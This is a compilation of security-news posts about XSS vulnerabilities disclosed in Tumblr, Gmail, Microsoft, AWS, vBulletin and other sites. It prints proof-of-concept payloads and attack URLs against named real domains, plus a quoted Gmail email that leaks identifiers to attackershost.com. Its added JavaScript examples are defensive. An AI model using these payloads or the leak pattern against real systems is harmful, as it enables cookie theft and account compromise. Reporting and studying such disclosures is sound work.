A security researcher, Riyaz Ahemed Walikar, has posted evidence of a serious persistent cross-site scripting (XSS) vulnerability on Tumblr, the popular microblogging platform.
XSS flaws are highly common on websites these days, but most of them are non-persistent and implicitly less dangerous.
"XSS can cause a lot of serious problems. An attacker can steal cookies, redirect users to fake or malicious sites, control a user's browser using automated frameworks like BeEF and download and execute exploits on the victim's computer," the researcher said in the blog post.
"Stored XSS is even more dangerous since the script is stored on the server and is executed every time a user visits an infected page."
The researcher found the vulnerability on the 'Register Application' page at http://www.tumblr.com/oauth/apps. The application was not sanitizing user input when a user created a new application. An XSS attack vector like tester "><img src='x' onerror="alert(document.cookie)"/> would trigger an alert box, displaying the user's cookie, in the browser.
Tumblr was notified of the issue more than three weeks ago and finally fixed the vulnerability today (July 14).
If you don't know what XSS is, you can read this article "Xss For Beginners".
A security researcher, Gambit, has discovered a cross-site scripting vulnerability in Microsoft's official website.
He found the vulnerability last month and reported the vulnerabilities to Microsoft.
"Well last month I was looking around on MSN.com and Microsoft.com I found two XSS vulnerabilities, one in each domain. I reported the vulnerabilities to the Microsoft security team and secured a spot on their acknowledgments page," Gambit said in his blog.
Microsoft listed his name on the 'Security Researcher Acknowledgments for Microsoft Online Services' page.
The 'asia.perf.glbdns.microsoft.com' page is vulnerable to XSS. The researcher managed to execute XSS code in the page.
POC: "asia.perf.glbdns.microsoft.com/files/top.php?domain=<script>alert(/Gambit/)</script>"
Security researcher Nils Junemann discovered persistent cross-site scripting (XSS) vulnerabilities in Gmail and notified Google a few months ago; Google has now patched the vulnerabilities.
According to his blog post, Junemann found three different XSS vulnerabilities in Gmail. The first security flaw is "Persistent DOM XSS (innerHTML) in Gmail's mobile view":
An incoming mail containing <img src=x onerror=prompt(1)> within the subject, when forwarded to another user, led to XSS.
The second one is a very simple non-persistent XSS in Gmail's mobile view:
https://mail.google.com/mail/mu/#cv/search/%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(2)%3E/foobar
The third security issue is a very interesting persistent XSS. He discovered that there was a way for an attacker to get access to several key pieces of information in the URLs that Gmail generates when it displays a message to a user.
When a message is displayed directly, rather than as part of a user's inbox, it contains both a static user ID and an identifier for the individual message. Those values shouldn't be available to an attacker, but Juenemann found that he could get them through referrer leaks.
"An attacker doesn't know the ik and the message id. Without both values it's not possible to generate the special URL. But it's easy to get both values through referer leaking.
We have to send to our victim a HTML e-mail with that content:
<img src="https://attackershost.com/1x1.gif">
<a href="https://attackershost.com/gmailxss">Click here to have fun</a>
<script>alert(/xss/)</script>"
When the user opens the email message, the GIF image will send the user ID and message ID to the attacker's server. The second URL also will leak that data if the user clicks on it. The script will then display a Javascript alert, and that's the attacker's code running in the context of Gmail.
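Added example, not taken from Junemann's post or from Gmail: a simplified model of how a browser chooses the Referer header under common Referrer-Policy values, showing why a remote image embedded in a message can receive identifiers carried in the page URL and which policies stop that. The webmail URL, the msg parameter name and the function names are constructed for illustration; only the ik name and the image URL come from the text above.

```javascript
// Added example: simplified Referrer-Policy model (https vs http only).
// MESSAGE_URL and the "msg" parameter are constructed, not Gmail's real format.
const MESSAGE_URL =
  "https://webmail.example/mail/?ik=CONSTRUCTED_IK&msg=CONSTRUCTED_MSG_ID#inbox";
const IMAGE_URL = "https://attackershost.com/1x1.gif"; // host quoted in the text

// Return the Referer value sent for a request from documentUrl to requestUrl,
// or null when no Referer header is sent.
function refererFor(documentUrl, requestUrl, policy) {
  const doc = new URL(documentUrl);
  const req = new URL(requestUrl);
  // The fragment and any credentials are never part of a Referer header.
  doc.hash = "";
  doc.username = "";
  doc.password = "";
  const full = doc.href;
  const originOnly = doc.origin + "/";
  const sameOrigin = doc.origin === req.origin;
  const downgrade = doc.protocol === "https:" && req.protocol !== "https:";

  switch (policy) {
    case "no-referrer":
      return null;
    case "unsafe-url":
      return full;
    case "origin":
      return originOnly;
    case "same-origin":
      return sameOrigin ? full : null;
    case "no-referrer-when-downgrade": // long-standing historical default
      return downgrade ? null : full;
    case "strict-origin-when-cross-origin":
      if (sameOrigin) return full;
      return downgrade ? null : originOnly;
    default:
      throw new Error("policy not modelled: " + policy);
  }
}

// Which of the sensitive query parameters survive in the Referer value?
function leakedParams(referer, sensitiveNames) {
  if (referer === null) return [];
  const params = new URL(referer).searchParams;
  return sensitiveNames.filter((name) => params.has(name));
}

// Summarise the exposure of ik/msg to the third-party image host per policy.
function exposureReport(policies) {
  return policies.map((policy) => {
    const referer = refererFor(MESSAGE_URL, IMAGE_URL, policy);
    return { policy, referer, leaked: leakedParams(referer, ["ik", "msg"]) };
  });
}

console.log(exposureReport([
  "no-referrer-when-downgrade",
  "strict-origin-when-cross-origin",
  "no-referrer",
]));
```

Keeping identifiers out of the URL, or serving message views with a restrictive Referrer-Policy, removes the leak regardless of what the message embeds.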
Security researcher Ankit Sharma has discovered cross-site scripting vulnerabilities in four antivirus websites.
The official websites belonging to BitDefender, AVG, Avira and Total Defense Antivirus are vulnerable to XSS.
In BitDefender TrafficLight, the URL input is not filtered for XSS. The URL input allows hackers to run malicious XSS code, which can result in phishing attacks.
POC:
http://trafficlight.bitdefender.com/info?url=%27;alert%28String.fromCharCode%2888,83,83,32,32,66,89,32,32,65,78,75,73,84%20%29%29//\%27;alert%28String.fromCharCode%2888,83,83,32,32,66,89,32,32,65,78,75,73,84%20%29%29//%22;alert%28String.fromCharCode%2888,83,83,32,32,66,89,32,32,65,78,75,73,84%20%29%29//\%22;alert%28String.fromCharCode%2888,83,83,32,32,66,89,32,32,65,78,75,73,84%20%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83,32,32,66,89,32,32,65,78,75,73,84%20%29%29%3C/SCRIPT%3E
Indian hacker Akshay discovered XSS vulnerabilities in more than 100 websites and listed the POCs on tinypaste.
The vulnerable sites include IndiaTimes, wikia.com, seagate and placementindia. Analysis of the paste shows that most of the sites are subdomains of the wikia website.
Some other sites that are vulnerable to XSS attack are dialabook.in, junglee.com, antya.com, t3.com and independent.co.uk.
In the past, he found XSS vulnerabilities in a lot of high-profile sites.
http://pastebin.com/tLXTZDvP
A hacker calling himself "5p1K3 BO7" found cross-site scripting vulnerabilities in some high-profile sites. The list of vulnerable sites includes Airtel, Ebay, Jusdial, rediff and NavBharatTimes.
He also found XSS vulnerabilities in the following sites: rovio.com, moneycontrol.com, In.Com, Reliance site, m.mytatasky.com, dinaralert.webs.com and domestichotels.yatra.com.
The list of vulnerable sites with screenshot:
Akshay, AKA 0z0n3, claimed that he has discovered a persistent XSS vulnerability in blogspot.com. He managed to inject the XSS vector in his own Blogger dashboard. He is sure it is not a template page (templates usually allow bloggers to inject scripts).
He used one of the following XSS vectors:
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
After injecting, he didn't get a pop-up, but after some minutes he started getting pop-ups. He reported the vulnerability to the Google Security team. Google did not reward the vulnerability.

"Thank you for your note. We took a look at the XSS issue you reported. Unfortunately, the XSS issue is executing on the blogspot domain and not blogger.com. We cover some of these scenarios here.
http://www.google.com/about/company/rewardprogram.html#javascript-blogger
Unfortunately, XSS issues on blogspot (as opposed to blogger.com) do not qualify for the VRP. If you manage to execute this javascript on someone else's blog or on the blogger.com domain, that would qualify for a reward," Google said in its response mail.
GreyHat hackers Sony and Flexxpoint have come up with an interesting XSS finding: a cross-site scripting vulnerability in Odnoklassniki. Odnoklassniki (Одноклассники in Russian, "Classmates") is a social network service for reuniting classmates and old friends, popular in Russia and other former Soviet republics. It was created by Albert Popkov on March 4, 2006.
He provided the vulnerable link and a video to demonstrate the vulnerability. The page is available only to logged-in users, so verifying the vulnerability requires logging in:
http://www.odnoklassniki.ru/dk?st.cmd=appSearchResultList&st.isEmpty=off&st.query=%22%22%3E%3Cscript%3Ealert%28%22Odnoklassniki.ru%20Cross%20Site%20Scripting%22%29%3C/script%3E%3Ciframe%20src=%22http://xssed.com%22%3E
Grey Hat hacker "Sony" has discovered a cross-site scripting (XSS) vulnerability in Radikal.ru. Radikal.ru is one of Russia's largest image hosting services, allowing you to quickly publish photos on various chat rooms, message boards, blogs and online forums.
He found XSS vulnerabilities in multiple pages.
Here is one of the vulnerable links:
http://www.radikal.ru/GALLERY/PageGallery.aspx?pg=258&period=022008%22%22%3E%3Cscript%3Ealert%28%22Radikal.ru%20Cross%20Site%20Scripting%22%29%3C/script%3E&id_gallery=-1
In order to see the other vulnerabilities, you have to log in to the website. The vulnerability resides in Edit pics, etc.
Security researcher Fabian Cuchietti discovered an XSS vulnerability in Amazon Web Services (aws.amazon.com).
It seems that the vulnerability has been fixed by the vendor: the admin managed to filter HTML code by converting it to HTML special characters. However, the mirror of the vulnerability can still be retrieved from XSSed.com.
Mirror is available here:
http://www.xssed.com/mirror/77551/
POC:
https://aws.amazon.com/amis?ami_provider_id=4&architecture='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x015E00)%3C/script%3E&selection=ami_provider_id%2Barchitecture
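Added example (not code from the original posts, Tumblr or AWS): the Tumblr 'Register Application' report earlier on this page and the AWS fix described above both come down to converting user input to HTML special characters before it is written into the page. The sketch runs the two payloads quoted on this page through a vulnerable and a hardened renderer and checks the resulting markup; the input-field template and all function names are assumptions.

```javascript
// Added example. Template and helper names are hypothetical; the two payloads
// are the ones quoted on this page, used only as test input for the encoder.
const TUMBLR_PAYLOAD = `tester "><img src='x' onerror="alert(document.cookie)"/>`;
const AWS_PAYLOAD = `'"--></style></script><script>alert(0x015E00)</script>`;

const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };

// Convert the five HTML-significant characters to entities so input can no
// longer close an attribute value or open a new tag.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable: input concatenated straight into a double-quoted attribute.
function renderFieldUnsafe(appName) {
  return '<input type="text" name="title" value="' + appName + '">';
}

// Hardened: same template, value entity-encoded at output time.
function renderFieldSafe(appName) {
  return '<input type="text" name="title" value="' + escapeHtml(appName) + '">';
}

// Minimal start-tag scanner for regression tests. It honours quoted attribute
// values and returns the lower-cased name of every element start tag.
function listStartTags(html) {
  const tags = [];
  let i = 0;
  while (i < html.length) {
    if (html[i] !== "<" || !/[a-zA-Z]/.test(html[i + 1] || "")) { i++; continue; }
    let j = i + 1;
    while (j < html.length && /[a-zA-Z0-9]/.test(html[j])) j++;
    tags.push(html.slice(i + 1, j).toLowerCase());
    let quote = null;
    for (; j < html.length; j++) {
      const ch = html[j];
      if (quote) { if (ch === quote) quote = null; }
      else if (ch === '"' || ch === "'") quote = ch;
      else if (ch === ">") break;
    }
    i = j + 1;
  }
  return tags;
}

// Regression check: a rendered field must contain exactly one element.
function fieldIsIntact(html) {
  const tags = listStartTags(html);
  return tags.length === 1 && tags[0] === "input";
}

for (const payload of [TUMBLR_PAYLOAD, AWS_PAYLOAD]) {
  console.log(fieldIsIntact(renderFieldUnsafe(payload)), fieldIsIntact(renderFieldSafe(payload)));
}
```

The encoder shown is correct for HTML text and quoted-attribute contexts only; values placed inside script blocks, URLs or CSS need the encoding for that context.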

A hacker group, TeamHav0k, has reformed as a new group called "TeamDigi7al". The group has become active and exposed vulnerabilities in some high-profile sites.
The hackers exposed XSS vulnerabilities in NASA (careerlaunch.jpl.nasa.gov), Vatican.va and weather.com. They found an SQL injection vulnerability in LoC (webarchive.loc.gov) and an LFI vulnerability in Humboldt State University (humboldt.edu).
The hackers also hacked and dumped the Bolivian Ambassador's inbox. They uploaded a 62MB RAR file (Emails.rar) to uppit.com.
A hacker calling himself "Silent Hacker" discovered an XSS vulnerability in Disney websites. The Disney.in website was found to be vulnerable to cross-site scripting.
POC:
http://www.disney.in/DisneyOnline/j/redirect.jsp?redirectURL=%22%3E%3Cscript%3Ealert%28%22XssEd%20By%20SilenT%20HaXoR%22%29%3C/script%3E
Grey Hat hacker "Sony" has discovered a cross-site scripting vulnerability in Nimbuzz Messenger. According to his report, Nimbuzz version 2.2.0 is vulnerable to XSS.
The hacker found the vulnerability in Chat Window --> View in Browser (persistent code). The 'forget password' page was found to be vulnerable to XSS.
Vulnerable Link:
http://www.nimbuzz.com/webchat_login?lang=en&step=2&login=error
Poc:
http://www.nimbuzz.com/webchat_login?lang=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
The GreyHat hacker 'Zer0Pwn' has discovered cross-site scripting as well as SQL injection vulnerabilities in the Yale University website. We are not providing the SQL injection vulnerable link for security reasons.
The POC for the XSS vulnerability:
http://bioinfo.mbb.yale.edu/genome/worm/search.cgi?orf=B0244.9%3Cscript%3Ealert%28%22Zer0Pwn%22%29%3C/script%3E
Security researchers Matías Lonigro and Fabián Cuchietti have discovered a self-XSS vulnerability in the Google Translator page. The vulnerability was found in the 'translating a Document' option.
Google Translate provides an easy way to translate whole documents, without the need for copying and pasting large blocks of text. Simply click the translate a document link and submit your file as a PDF, TXT, DOC, PPT, XLS or RTF.
The uploader also allows HTML files. Unfortunately, it does not filter the HTML tags, so the HTML code as well as any JavaScript code is executed. Uploading an HTML file with embedded JavaScript executes the script.
The researchers also provided a POC video.
Even though this is a self-XSS vulnerability, we cannot simply ignore it. Hopefully, Google will fix this issue as soon as possible.
GreyHat hackers Sony and Flexxpoint have discovered reflected and persistent XSS vulnerabilities in vBulletin, one of the most famous and powerful forum software packages. The hackers claimed that they found the XSS vulnerability in vBulletin 3.8.x - 4.1.11.
The hackers discovered XSS vulnerabilities in a lot of places, including the '/forum/blog.php' and 'forum/group.php' pages on vBulletin's official websites.

The hackers also found a persistent XSS vulnerability in chinclub.ru. They tested this vulnerability in other forums as well, including the demo vBulletin forum, version 4.1.10 (https://www.vbulletin.com/admindemo.php). The hackers said it works in other versions too.
The hackers also provided us with a simple POC video.
Another hacker, ".eof", also discovered and published a POC for the XSS vulnerability in the vBulletin board last month.
GreyHat hackers Sony and Flexxpoint have come up with an interesting XSS finding in Invision Power Board. He is not sure which version of IP Board is vulnerable, but he is sure it is between 3.1.x and 3.2.x.
A lot of websites use IP Board for their support forums. The forums for PCWorld, GovernmentSecurity.org, Webmoney.ru and Dr.Web are affected by this vulnerability.
The 'New-other Recipients' field in the compose form of the Personal Messenger page was found to be vulnerable to XSS attack. Inserting XSS code in 'New-other Recipients' and pressing the send/preview button executes the script.
The XSS vulnerability in IP Board version 3.2.3, which Dr.Web uses, had already been fixed, but it still exists in Dr.Web's forum because they were running unpatched software at the time of writing this post.